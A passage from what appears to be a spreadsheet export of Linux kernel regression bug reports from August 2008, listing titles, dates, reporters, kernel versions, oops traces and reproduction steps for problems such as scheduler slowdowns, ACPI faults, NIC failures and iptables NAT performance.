? sock_sendmsg+0xc5/0xf0 [&lt;c01363a0&gt;] ? autoremove_wake_function+0x0/0x50 [&lt;c01363a0&gt;] ? autoremove_wake_function+0x0/0x50 [&lt;c02fa165&gt;] ? sock_sendmsg+0xc5/0xf0 [&lt;c0217f37&gt;] ? copy_from_user+0x37/0x70 [&lt;c03018ec&gt;] ? verify_iovec+0x2c/0x90 [&lt;c02fa29a&gt;] ? sys_sendmsg+0x10a/0x220 [&lt;c015ab08&gt;] ? __inc_zone_page_state+0x18/0x20 [&lt;c01642ed&gt;] ? __page_set_anon_rmap+0x2d/0x40 [&lt;c0164325&gt;] ? page_add_new_anon_rmap+0x25/0x30 [&lt;c015eda6&gt;] ? handle_mm_fault+0x606/0x750 [&lt;c0160f5e&gt;] ? vma_adjust+0xfe/0x410 [&lt;c0113156&gt;] ? do_page_fault+0x126/0x830 [&lt;c02fb343&gt;] ? sys_socketcall+0x233/0x260 [&lt;c0102f39&gt;] ? sysenter_past_esp+0x6a/0x91 ======================= Code: 62 01 00 00 c6 43 01 80 8b 45 0c 85 c0 0f 85 13 02 00 00 8b 45 d8 85 c0 74 3c 8b 86 88 00 00 00 8d 5d e0 31 c9 89 1c 24 8b 55 d8 &lt;8b&gt; 00 e8 d4 e3 ff ff 85 c0 75 20 b9 10 00 00 00 ba 07 00 00 00 EIP: [&lt;c0369b85&gt;] rt6_fill_node+0x175/0x3b0 SS:ESP 0068:f7115ba4 ---[ end trace e9f2563374550ae8 ]--- Steps to reproduce: $ ip -f inet6 route get fec0::1</t>
  </si>
  <si>
    <t>30x increase in context switches from 2.6.23 -&gt; 2.6.25</t>
  </si>
  <si>
    <t>2.6.25.15</t>
  </si>
  <si>
    <t>2008-08-11 07:49 UTC</t>
  </si>
  <si>
    <t>2012-05-22 13:17 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23.17 Earliest failing kernel version: 2.6.25 Distribution: Fedora Hardware Environment: 2x2=4 core blade server Software Environment: Fedora Core 6 + vanilla 2.6.25 kernel + apache-2.0.59 Problem Description: We run a fairly busy php website (5000+ requests per second) loadbalanced over 10 nodes. On 2.6.23 we se an entirely acceptable 3000 context switches per second, when we upgrade the kernel to 2.6.25(.15) this increases to 100.000+ context switches per second. Because of the high number of context switches the CPU drowns in %system time and doesn't do many useful tasks anymore. user time in both cases is about 25%, but %system time is 5% on 2.6.23 and 50% on 2.6.25 (2.6.25 doesn't add up to 100% CPU time, there's actually 25% idle time left, thats because apache is limited to maxclients=8) I had a look at these threads: http://www.gossamer-threads.com/lists/linux/kernel/924221?search_string=2.6.25%20scheduler;#924221 http://fixunix.com/kernel/328115-performance-loss-2-6-22-22-6-23-2-6-24-rc7-cpu-intensive-benchmark-8-core-xeon.html and tried all /proc/sys/kernel/sched* tunables listed there, but to no avail. Because of the loadbalanced setup of the website, I can run 2.6.23 and 2.6.25 side by side, under the same workload and look for any differences. Steps to reproduce: Apparently: run a php webserver website on 2.6.25...</t>
  </si>
  <si>
    <t>mysql+oltp regression</t>
  </si>
  <si>
    <t>2008-08-11 14:03 UTC</t>
  </si>
  <si>
    <t>2008-08-12 11:23 UTC</t>
  </si>
  <si>
    <t>Subject : [revert] mysql+oltp regression Submitter : Mike Galbraith &lt;efault@gmx.de&gt; Date : 2008-08-11 11:32 References : http://marc.info/?l=linux-kernel&amp;m=121845436903678&amp;w=4 Handled-By : Mike Galbraith &lt;efault@gmx.de&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121845436903678&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>tbench regression on each kernel release from  2.6.22 -&gt; 2.6.28</t>
  </si>
  <si>
    <t>2008-08-11 14:08 UTC</t>
  </si>
  <si>
    <t>2008-11-22 13:50 UTC</t>
  </si>
  <si>
    <t>Subject : tbench regression on each kernel release from 2.6.22 -&gt; 2.6.28 Submitter : Christoph Lameter &lt;cl@linux-foundation.org&gt; Date : 2008-08-11 18:36 References : http://marc.info/?l=linux-kernel&amp;m=121847986119495&amp;w=4 Handled-By : "Kok, Auke" &lt;auke-jan.h.kok@intel.com&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>THRM temperature reported as 3428C</t>
  </si>
  <si>
    <t>2.6.26.2-2.fc8</t>
  </si>
  <si>
    <t>2008-08-12 06:24 UTC</t>
  </si>
  <si>
    <t>James</t>
  </si>
  <si>
    <t>2008-11-07 12:01 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.7-92.fc8 Earliest failing kernel version: 2.6.26.2-2.fc8 Distribution: Fedora 8 Hardware Environment: Clevo M720R notebook with Intel T8100 processor Software Environment: i686 Problem Description: The contents of /proc/acpi/thermal_zone/THRM/temperature reported a temperature of 3428C. This seemed to happen shortly after the hardware active cooling trip-point was reached and the fans activated around 53C in THRM). The machine continued to operate without any problems, despite the erroneous ACPI temperature report. coretemp reported: $ sensors coretemp-isa-0000 Adapter: ISA adapter Core 0: +42°C (high = +100°C) coretemp-isa-0001 Adapter: ISA adapter Core 1: +42°C (high = +100°C) The following was in dmesg: ACPI Exception (thermal-0469): AE_ERROR, ACPI thermal trip point state changed Please send acpidump to linux-acpi@vger.kernel.org [20080321] ACPI: EC: acpi_ec_wait timeout, status = 0x09, event = "b0=1" ACPI: EC: read timeout, command = 130 For this machine's acpidump, see attachment 17030 [details] for bug 11170.</t>
  </si>
  <si>
    <t>MSI VR 330 Laptop hard locks with 2.6.24 and upper kernels</t>
  </si>
  <si>
    <t>2008-08-12 07:18 UTC</t>
  </si>
  <si>
    <t>Cenk Limni</t>
  </si>
  <si>
    <t>2008-11-17 17:15 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.23 Earliest failing kernel version:2.6.25 Distribution:Arch Linux, Pardus, OpenSuSe 11.0, gOS etc.. Hardware Environment:MSI VR330 Laptop (AMD Sempron 3600+ 2gb 667mhz kingston DDR2 RAM, Nvidia Go6100, Realtek ALC883 Sound card, Ralink rt73 wireless adapter) Software Environment: Problem Description:Computer hard locks at any time. Many different distrubitons made this. Not only the X server, when i boot from terminal it's locked in terminal also. When i boot the distro with "acpi=off" parameter there's no locking. Steps to reproduce:</t>
  </si>
  <si>
    <t>dl2k fails to work since 2.6.25</t>
  </si>
  <si>
    <t>2008-08-12 10:55 UTC</t>
  </si>
  <si>
    <t>Dmitry I. Kulagin</t>
  </si>
  <si>
    <t>2012-05-25 04:32 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.4 Earliest failing kernel version: 2.6.25, 2.6.24 (the last was fixed in 2.6.24.3) Distribution: Debian Sid Hardware Environment: 2xPentiumIII 800 on a Supermicro board, dl2k nic in PCI-X 66MHz slot, lspci result 00:00.0 Host bridge: Broadcom CNB20LE Host Bridge (rev 05) 00:00.1 Host bridge: Broadcom CNB20LE Host Bridge (rev 05) 00:03.0 Ethernet controller: D-Link System Inc DL2000-based Gigabit Ethernet (rev 0c) 00:06.0 Ethernet controller: Intel Corporation 82557/8/9/0/1 Ethernet Pro 100 (rev 08) 00:0f.0 ISA bridge: Broadcom OSB4 South Bridge (rev 4f) 00:0f.1 IDE interface: Broadcom OSB4 IDE Controller 00:0f.2 USB Controller: Broadcom OSB4/CSB5 OHCI USB Controller (rev 04) 01:01.0 RAID bus controller: Silicon Image, Inc. SiI 3114 [SATALink/SATARaid] Serial ATA Controller (rev 02) 01:02.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX/MX 400] (rev b2) 01:03.0 SCSI storage controller: Adaptec AIC-7892P U160/m (rev 02) Software Environment: any Problem Description: The first 2.6.24 linux kernel introduced the bug with this dl2k based nic. After bringing the interface up no packet gets into the wire without any error messages. There are some difference in kernel initialization messages: from 2.6.24.4 dmesg: DL2000/TC902x-based linux driver v1.19 2007/08/12 ACPI: PCI Interrupt 0000:00:03.0[A] -&gt; GSI 20 (level, low) -&gt; IRQ 16 eth0: D-Link DGE-550T Gigabit Ethernet Adapter, 00:11:95:f4:b7:df, IRQ 16 tx_coalesce:^I16 packets rx_coalesce:^I10 packets rx_timeout: ^I128000 ns from 2.6.26 dmesg: [ 10.747031] ACPI: PCI Interrupt 0000:00:03.0[A] -&gt; GSI 20 (level, low) -&gt; IRQ 20 [ 10.747031] 0000:00:03.0: D-Link NIC [ 10.791499] Ethernet device registered as: eth1 The 2.6.24.3 kernel fixed the problem with this log in ChangeLog: - Fix dl2k constants But since then in all 2.6.25 and 2.6.26 series of linux kernel the problem persist. Steps to reproduce: Just get dl2k based nic, bring the interface up and try to ping something. Thank you in advance, D.I. Kulagin</t>
  </si>
  <si>
    <t>severe performance regression for iptables nat routing</t>
  </si>
  <si>
    <t>2.6.27-rc3</t>
  </si>
  <si>
    <t>2008-08-12 22:04 UTC</t>
  </si>
  <si>
    <t>Alex Williamson</t>
  </si>
  <si>
    <t>2008-08-22 16:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.2 Earliest failing kernel version: 2.6.27-rc2 (maybe earlier) Distribution: Ubuntu Hardware Environment: x86_64 Software Environment: 32bit userspace/64bit kernel Problem Description: When using iptables to intercept addr:port and reroute through an ssh tunnel, I see a huge performance hit on the 2.6.27-rc series relative to 2.6.26 (34KB/s vs 1+MB/s). Steps to reproduce: Setup and ssh tunnel to one of the kernel.org servers using a system on your local network: ssh -L 8888:204.152.191.37:80 &lt;local system&gt; Leave the ssh session running. In a new terminal (on your local system), verify performance of direct access versus the tunnel: wget -O /dev/null http://204.152.191.37/pub/linux/kernel/v2.6/linux-2.6.26.2.tar.bz2 wget -O /dev/null http://127.0.0.1:8888/pub/linux/kernel/v2.6/linux-2.6.26.2.tar.bz2 These should be roughly the same. Now setup iptables so that when you try to access 204.152.191.37:80 you'll automatically be redirected to the ssh tunnel: sudo iptables -t nat -N bug sudo iptables -t nat -I OUTPUT 1 -j bug sudo iptables -t nat -A bug -d 204.152.191.37 -p tcp --dport 80 -j DNAT --to-destination 127.0.0.1:8888 Repeat the performance test: wget -O /dev/null http://204.152.191.37/pub/linux/kernel/v2.6/linux-2.6.26.2.tar.bz2 wget -O /dev/null http://127.0.0.1:8888/pub/linux/kernel/v2.6/linux-2.6.26.2.tar.bz2 On 2.6.27-rc2+ My rate quickly drops down to ~34KB/s using the iptables nat'd wget (204.152.191.37) while the ssh tunnel still runs 1+MB/s. On 2.6.26 I get similar performance for both paths.</t>
  </si>
  <si>
    <t>ext4 mount problem (proc_dir_entry 'stats' already registered)</t>
  </si>
  <si>
    <t>2008-08-13 11:15 UTC</t>
  </si>
  <si>
    <t>2009-01-17 19:16 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: 2.6.27-rc3 Distribution: Debian Hardware Environment: Software Environment: Problem Description: Steps to reproduce: Freshly created fs using: mkfs -E test_fs -t ext3 /dev/cciss/c0d0p8 tune2fs -O extents -E test_fs /dev/cciss/c0d0p8 then mounted via: mount /squid-cache0 from fstab: # &lt;file system&gt; &lt;mount point&gt; &lt;type&gt; &lt;options&gt; &lt;dump&gt; &lt;pass&gt; /dev/cciss/c0d0p8 /squid-cache0 auto defaults,noatime,nodev,noexec,errors=panic 0 1 results in: /dev/cciss/c0d0p8 on /squid-cache0 type ext4dev (rw,noexec,nodev,noatime,errors=panic) in dmesg I get: [ 5.586583] proc_dir_entry 'stats' already registered complete dmesg (attached)</t>
  </si>
  <si>
    <t>/proc/diskstats does not contain all disk devices</t>
  </si>
  <si>
    <t>2.6.27-rcX</t>
  </si>
  <si>
    <t>2008-08-13 12:12 UTC</t>
  </si>
  <si>
    <t>Andy Ryan</t>
  </si>
  <si>
    <t>2008-08-23 12:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.27-rc1 Distribution: Debian Hardware Environment: Dell Software Environment: Problem Description: /proc/diskstats does not contain all the block devices it should. /sys/block has all the devices, but /proc/diskstats does not. Steps to reproduce: boot a system with &gt;9 (10?) disk devices (24 block devices?)</t>
  </si>
  <si>
    <t>Incorrect value in /sys/devices/platform/w83627hf.656/cpu0_vid</t>
  </si>
  <si>
    <t>2008-08-14 02:58 UTC</t>
  </si>
  <si>
    <t>2008-08-15 12:16 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27-rc2-git1 Earliest failing kernel version: 2.6.27-rc2-git2 Distribution: Debian Sid Hardware Environment: Athlon 64 x2 4200+ Software Environment: X86_64 Problem Description: in git1 and previous, cpu0_vid is reported as 1475 (which is correct). Since git2, it is reported as 725 Steps to reproduce: see in /sys/devices/platform/w83627hf.656/cpu0_vid According to this value, the sensors command reports ccpu0_vid as +0.725V This problem occurs in rc2-git2 and was not present in rc2-git1, it is still present in rc3-git1 Regards Jean-Luc</t>
  </si>
  <si>
    <t>int3: 0000 in tsc_read_refs when using powernow_k7</t>
  </si>
  <si>
    <t>2008-08-14 04:21 UTC</t>
  </si>
  <si>
    <t>Mikko Vinni</t>
  </si>
  <si>
    <t>2008-08-19 09:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.26-rc5 (newer ones not tested until 2.6.27-rc2) Earliest failing kernel version: 2.6.27-rc2 Distribution: Ubuntu 8.04.1 Hardware Environment: hp nx9005, mobile AMD Athlon(tm) XP2000+ Problem Description: loading powernow-k7 causes an int3, and frequency scaling doesn't work. ... [ 32.943714] toshiba_acpi: Unknown parameter `hotkeys_over_acpi' [ 32.970019] ACPI: WMI: Mapper loaded [ 33.220020] powernow: PowerNOW! Technology present. Can scale: frequency and voltage. [ 33.220020] int3: 0000 [#1] [ 33.220020] Modules linked in: powernow_k7(+) cpufreq_userspace cpufreq_stats cpufreq_powersave cpufreq_conservative wmi sbs sbshc xfs sr_mod sbp2 parport_pc lp parport i2c_ali1535 joydev psmouse serio_raw i2c_ali15x3 i2c_core snd_ali5451 snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm container snd_seq_dummy video output snd_seq_oss snd_seq_midi battery snd_rawmidi snd_seq_midi_event ac button snd_seq snd_timer snd_seq_device snd ati_agp soundcore snd_page_alloc agpgart shpchp pci_hotplug af_packet evdev iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack iptable_mangle iptable_filter ip_tables x_tables ext3 jbd mbcache ide_cd_mod cdrom ide_disk pata_acpi ata_generic libata scsi_mod dock alim15x3 floppy ide_pci_generic ohci1394 natsemi ide_core ieee1394 ohci_hcd usbcore thermal processor fan fuse fbcon tileblit font bitblit softcursor [ 33.220020] [ 33.220020] Pid: 4970, comm: modprobe Not tainted (2.6.27-rc3-rieska #1) [ 33.220020] EIP: 0060:[&lt;c03e6e81&gt;] EFLAGS: 00000046 CPU: 0 [ 33.220020] EIP is at tsc_read_refs+0x1/0xb0 [ 33.220020] EAX: dbcd4ca4 EBX: 00000000 ECX: c0010042 EDX: 00000000 [ 33.220020] ESI: 000b0b0b EDI: 00000246 EBP: dbcd4cb8 ESP: dbcd4c60 [ 33.220020] DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 [ 33.220020] Process modprobe (pid: 4970, ti=dbcd4000 task=dd4d3c50 task.ti=dbcd4000) [ 33.220020] Stack: c0108b89 ffffffff 0000006c 37303c50 dbcd4d88 deb7da6c c03b4320 00000044 [ 33.220020] 00000000 c03c2da4 001201d2 dbcd4cc0 dd4d0000 dbcd4cb0 c01e5156 dbcd4cb8 [ 33.220020] c0138c4e dbcd4cd0 00003940 00194663 000b0b0b fffffff4 dbcd4ccc c0108ff7 [ 33.220020] Call Trace: [ 33.220020] [&lt;c0108b89&gt;] ? native_calibrate_tsc+0x29/0x2c0 [ 33.220020] [&lt;c01e5156&gt;] ? string+0x26/0x90 [ 33.220020] [&lt;c0138c4e&gt;] ? getnstimeofday+0x3e/0xe0 [ 33.220020] [&lt;c0108ff7&gt;] ? recalibrate_cpu_khz+0x37/0x80 [ 33.220020] [&lt;deb801a2&gt;] ? powernow_cpu_init+0x32/0x4ae [powernow_k7] [ 33.220020] [&lt;c02d73eb&gt;] ? down_write+0xb/0x30 [ 33.220020] [&lt;c0255cb2&gt;] ? cpufreq_add_dev+0xb2/0x260 [ 33.220020] [&lt;c0122c97&gt;] ? release_console_sem+0x187/0x1a0 [ 33.220020] [&lt;c0243575&gt;] ? sysdev_driver_register+0x75/0x120 [ 33.220020] [&lt;c0255985&gt;] ? cpufreq_register_driver+0x55/0xb0 [ 33.220020] [&lt;deb800ce&gt;] ? powernow_init+0x8e/0x130 [powernow_k7] [ 33.220020] [&lt;c0101239&gt;] ? do_one_initcall+0x29/0x150 [ 33.220020] [&lt;deb80040&gt;] ? powernow_init+0x0/0x130 [powernow_k7] [ 33.220020] [&lt;c016c71c&gt;] ? __vunmap+0x6c/0xd0 [ 33.220020] [&lt;c0141f57&gt;] ? sys_init_module+0x127/0x1ac0 [ 33.220020] [&lt;c015a645&gt;] ? filemap_fault+0x255/0x3a0 [ 33.220020] [&lt;c0103a3d&gt;] ? sysenter_do_call+0x12/0x25 [ 33.220020] ======================= [ 33.220020] Code: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc &lt;cc&gt; cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc [ 33.220020] EIP: [&lt;c03e6e81&gt;] tsc_read_refs+0x1/0xb0 SS:ESP 0068:dbcd4c60 [ 33.220020] ---[ end trace 90ef9dbcb2b9d03e ]--- An alternative trace with -rc2: [ 37.067660] int3: 0000 [#1] [ 37.067746] Modules linked in: powernow_k7(+) cpufreq_userspace cpufreq_stats cpufreq_powersave cpufreq_conservative wmi sbs sbshc xfs sr_mod sbp2 parport_pc lp parport i2c_ali1535 joydev psmouse serio_raw i2c_ali15x3 i2c_core snd_ali5451 snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy container video output snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq battery snd_timer snd_seq_device ac button snd soundcore shpchp pci_hotplug snd_page_alloc ati_agp agpgart af_packet evdev iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack iptable_mangle iptable_filter ip_tables x_tables ext3 jbd mbcache ide_cd_mod cdrom ide_disk pata_acpi ata_generic libata scsi_mod dock usbhid hid alim15x3 floppy ide_pci_generic ohci1394 natsemi ide_core ieee1394 ohci_hcd usbcore thermal processor fan fuse fbcon tileblit font bitblit softcursor [ 37.070736] [ 37.070780] Pid: 5225, comm: modprobe Not tainted (2.6.27-rc2-rieska #1) [ 37.070831] EIP: 0060:[&lt;c03e6fe1&gt;] EFLAGS: 00000046 CPU: 0 [ 37.070895] EIP is at tsc_read_refs+0x1/0xb0 [ 37.070941] EAX: dc489d18 EBX: 00000000 ECX: c0010042 EDX: 00000000 [ 37.070990] ESI: 000b0b0b EDI: 00000246 EBP: dc489d2c ESP: dc489cd4 [ 37.071039] DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 [ 37.071089] Process modprobe (pid: 5225, ti=dc489000 task=db8bb040 task.ti=dc489000) [ 37.071140] Stack: c0108b89 ffffffff 0000006c db8bc88c dc489dfc deb92a6c db8bc88c 00000006 [ 37.071477] 00000000 00000002 dc48e0c6 ffffffff ffffffff ffffffff dc489d38 dc489e7c [ 37.071812] c0370479 00000000 00000212 00194662 000b0b0b fffffff4 dc489d40 c0108ff7 [ 37.072147] Call Trace: [ 37.072228] [&lt;c0108b89&gt;] ? native_calibrate_tsc+0x29/0x2c0 [ 37.072350] [&lt;c0108ff7&gt;] ? recalibrate_cpu_khz+0x37/0x80 [ 37.072462] [&lt;dea4e1a2&gt;] ? powernow_cpu_init+0x32/0x4ae [powernow_k7] [ 37.072583] [&lt;c01e02c5&gt;] ? ida_get_new_above+0x75/0x170 [ 37.072697] [&lt;c018c79d&gt;] ? find_inode+0x3d/0x70 [ 37.072813] [&lt;c02d730b&gt;] ? down_write+0xb/0x30 [ 37.072927] [&lt;c0255c22&gt;] ? cpufreq_add_dev+0xb2/0x260 [ 37.073046] [&lt;c0122b07&gt;] ? release_console_sem+0x187/0x1a0 [ 37.073162] [&lt;c02434e5&gt;] ? sysdev_driver_register+0x75/0x120 [ 37.073277] [&lt;c02558f5&gt;] ? cpufreq_register_driver+0x55/0xb0 [ 37.073352] [&lt;dea4e0ce&gt;] ? powernow_init+0x8e/0x130 [powernow_k7] [ 37.073352] [&lt;c0141fc4&gt;] ? sys_init_module+0x124/0x1ac0 [ 37.073352] [&lt;c015a6b5&gt;] ? filemap_fault+0x255/0x3a0 [ 37.073352] [&lt;c0103a3d&gt;] ? sysenter_do_call+0x12/0x25 [ 37.073352] ======================= [ 37.073352] Code: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc &lt;cc&gt; cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc [ 37.073352] EIP: [&lt;c03e6fe1&gt;] tsc_read_refs+0x1/0xb0 SS:ESP 0068:dc489cd4 [ 37.073352] ---[ end trace 18f36a04897ae05c ]--- Steps to reproduce: seems to happen when I reboot either of those two test kernels (only booted each once). An uneducated question: can tsc_read_refs be __init? static u64 __init tsc_read_refs(u64 *pm, u64 *hpet) { ... } unsigned long native_calibrate_tsc(void) { unsigned long flags; u64 tsc1, tsc2, tr1, tr2, delta, pm1, pm2, hpet1, hpet2; int hpet = is_hpet_enabled(); unsigned int tsc_khz_val = 0; local_irq_save(flags); tsc1 = tsc_read_refs(&amp;pm1, hpet ? &amp;hpet1 : NULL); ... } This may be another bug, but the laptop seems to hang after flashing the keyboard leds when trying to shutdown or reboot. With the 2.6.26-rc6 kernel I am running it works fine (as does the cpufreq driver).</t>
  </si>
  <si>
    <t>Fan speed setting reset after suspend to disk/ram on Thinkpad X31</t>
  </si>
  <si>
    <t>2.6.26-1</t>
  </si>
  <si>
    <t>2008-08-14 06:45 UTC</t>
  </si>
  <si>
    <t>Richard Hartmann</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Thinkpad X31 Software Environment: Debian unstable Problem Description: After waking the system from suspend to disk/ram, the fan speed is reset to the default value. As I understand things, the value should be cached and re-set to what I last set it to. Steps to reproduce: # echo "options thinkpad_acpi fan_control=1" &gt;&gt; /etc/modprobe.d/options # shutdown -r now # echo level 7 &gt;! /proc/acpi/ibm/fan #fan will spin on fastest level, you will hear this # cat /proc/acpi/ibm/fan status: enabled speed: 4107 level: 7 commands: level &lt;level&gt; (&lt;level&gt; is 0-7, auto, disengaged, full-speed) commands: enable, disable commands: watchdog &lt;timeout&gt; (&lt;timeout&gt; is 0 (off), 1-120 (seconds)) commands: speed &lt;speed&gt; (&lt;speed&gt; is 0-65535) # s2ram || s2disk press Fn-F4 or power button to wake system # cat /proc/acpi/ibm/fan status: enabled speed: 0 level: auto commands: level &lt;level&gt; (&lt;level&gt; is 0-7, auto, disengaged, full-speed) commands: enable, disable commands: watchdog &lt;timeout&gt; (&lt;timeout&gt; is 0 (off), 1-120 (seconds)) commands: speed &lt;speed&gt; (&lt;speed&gt; is 0-65535)</t>
  </si>
  <si>
    <t>myri10ge: use ioremap_wc: compilation failure on ARM</t>
  </si>
  <si>
    <t>commit c7f80993a38f0354a8ad821bcd9335b47a464357</t>
  </si>
  <si>
    <t>2008-08-14 08:14 UTC</t>
  </si>
  <si>
    <t>2008-09-12 11:45 UTC</t>
  </si>
  <si>
    <t>Subject : myri10ge: use ioremap_wc: compilation failure on ARM Submitter : Martin Michlmayr &lt;tbm@cyrius.com&gt; Date : 2008-08-10 11:25 References : http://marc.info/?l=linux-netdev&amp;m=121836771727632&amp;w=2 Handled-By : Brice Goglin &lt;brice@myri.com&gt; Handled-By : Russell King &lt;rmk+lkml@arm.linux.org.uk&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc2:stall while mounting root fs</t>
  </si>
  <si>
    <t>2008-08-14 08:46 UTC</t>
  </si>
  <si>
    <t>2008-09-21 13:07 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc2:stall while mounting root fs Submitter : "Torsten Kaiser" &lt;just.for.lkml@googlemail.com&gt; Date : 2008-08-12 12:37 References : http://marc.info/?l=linux-kernel&amp;m=121854484015909&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Warning in during hotplug on 2.6.27-rc2-git5</t>
  </si>
  <si>
    <t>2.6.27-rc2-git5</t>
  </si>
  <si>
    <t>2008-08-14 08:53 UTC</t>
  </si>
  <si>
    <t>2008-08-25 13:51 UTC</t>
  </si>
  <si>
    <t>Subject : Warning in during hotplug on 2.6.27-rc2-git5 Submitter : Mark Langsdorf &lt;mark.langsdorf@amd.com&gt; Date : 2008-08-12 21:56 References : http://marc.info/?l=linux-kernel&amp;m=121857820413373&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ia64 allmodconfig on current mainline</t>
  </si>
  <si>
    <t>2008-08-14 08:57 UTC</t>
  </si>
  <si>
    <t>2008-08-18 16:59 UTC</t>
  </si>
  <si>
    <t>Subject : ia64 allmodconfig on current mainline Submitter : Andrew Morton &lt;akpm@linux-foundation.org&gt; Date : 2008-08-12 22:06 References : http://marc.info/?l=linux-ia64&amp;m=121857881314455&amp;w=4 Handled-By : "Luck, Tony" &lt;tony.luck@intel.com&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Only one of my cpus seems to powered down by cpufreq</t>
  </si>
  <si>
    <t>2008-08-14 09:00 UTC</t>
  </si>
  <si>
    <t>2008-08-20 10:40 UTC</t>
  </si>
  <si>
    <t>Subject : Re: Linux 2.6.27-rc3 Submitter : "Torsten Kaiser" &lt;just.for.lkml@googlemail.com&gt; Date : 2008-08-13 20:18 References : http://marc.info/?l=linux-kernel&amp;m=121865907511340&amp;w=4 Handled-By : "Langsdorf, Mark" &lt;mark.langsdorf@amd.com&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc1 - ext4 e2fsck false prompting for fixing i_size of Inode</t>
  </si>
  <si>
    <t>2008-08-14 09:08 UTC</t>
  </si>
  <si>
    <t>2008-08-17 07:27 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.27-rc1 - ext4 e2fsck false prompting for fixing i_size of Inode Submitter : Kamalesh Babulal &lt;kamalesh@linux.vnet.ibm.com&gt; Date : 2008-08-13 6:56 References : http://marc.info/?l=linux-kernel&amp;m=121861058720051&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Linux 2.6.27-rc3: kernel BUG at mm/vmalloc.c - bisected</t>
  </si>
  <si>
    <t>2008-08-14 09:13 UTC</t>
  </si>
  <si>
    <t>2008-08-25 14:45 UTC</t>
  </si>
  <si>
    <t>Subject : Linux 2.6.27-rc3: kernel BUG at mm/vmalloc.c - bisected Submitter : "Alan D. Brunelle" &lt;Alan.Brunelle@hp.com&gt; Date : 2008-08-13 23:03 References : http://marc.info/?l=linux-kernel&amp;m=121866876027629&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>SATA Cold Boot Problems with 2.6.27-rc[23] on nVidia 680i</t>
  </si>
  <si>
    <t>2.6.27-rc[23]</t>
  </si>
  <si>
    <t>2008-08-14 09:16 UTC</t>
  </si>
  <si>
    <t>2008-09-16 22:13 UTC</t>
  </si>
  <si>
    <t>Subject : SATA Cold Boot Problems with 2.6.27-rc[23] on nVidia 680i Submitter : "Manny Maxwell" &lt;mannymax@mannymax.net&gt; Date : 2008-08-14 4:16 References : http://marc.info/?l=linux-kernel&amp;m=121868782917600&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>lockdep link failed</t>
  </si>
  <si>
    <t>commit b635acec48bcaa9183fcbf4e3955616b0d4119b5</t>
  </si>
  <si>
    <t>2008-08-14 09:20 UTC</t>
  </si>
  <si>
    <t>2008-08-24 12:21 UTC</t>
  </si>
  <si>
    <t>Subject : BUG : lockdep link failed Submitter : "Ming Lei" &lt;tom.leiming@gmail.com&gt; Date : 2008-08-14 9:58 References : http://marc.info/?l=linux-kernel&amp;m=121870792715847&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>CPUIDLE  does not see C2, C3 on SMP Opteron system</t>
  </si>
  <si>
    <t>2.6.26.2(mainline)</t>
  </si>
  <si>
    <t>2008-08-14 19:15 UTC</t>
  </si>
  <si>
    <t>vit</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: 2.6.25.[9-14](fedora) 2.6.26.2(mainline) Distribution: Fedora 9 Hardware Environment: 2 Opteron 2356 on S2915 Tyan MB Software Environment: Problem Description: Cpuidle does not work on dual cpu quad-core Opteron system, sensors reports around 48C and 61C under 0 load for the first and second CPUs respectively. Both menu and ladder governors give similar results. Recompiling kernel with "CONFIG_CPU_IDLE is not set" gives around 35C and 41C under 0 load. Steps to reproduce:</t>
  </si>
  <si>
    <t>kernel BUG at arch/x86/mm/pat.c:233!</t>
  </si>
